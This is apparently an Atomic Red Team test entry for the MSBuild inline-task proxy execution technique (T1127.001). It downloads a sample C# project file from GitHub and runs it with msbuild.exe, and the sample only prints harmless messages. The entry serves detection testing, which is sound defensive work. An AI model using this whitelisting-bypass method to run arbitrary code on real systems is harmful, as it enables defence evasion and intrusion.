#TechniqueName: Trusted Developer Utilities Proxy Execution: MSBuild
#AtomicTestName: MSBuild Bypass Using Inline Tasks (C#)
#Description: Executes the code in a project file using msbuild.exe. The default C# project example file (T1127.001.csproj) will simply print "Hello From a Code Fragment" and "Hello From a Class." to the screen.&
#Language: cmd

#get_prereq_commands
New-Item -Type Directory (split-path PathToAtomicsFolder\T1127.001\src\T1127.001.csproj) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/T1127.001.csproj" -OutFile "PathToAtomicsFolder\T1127.001\src\T1127.001.csproj"


#commands
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe PathToAtomicsFolder\T1127.001\src\T1127.001.csproj

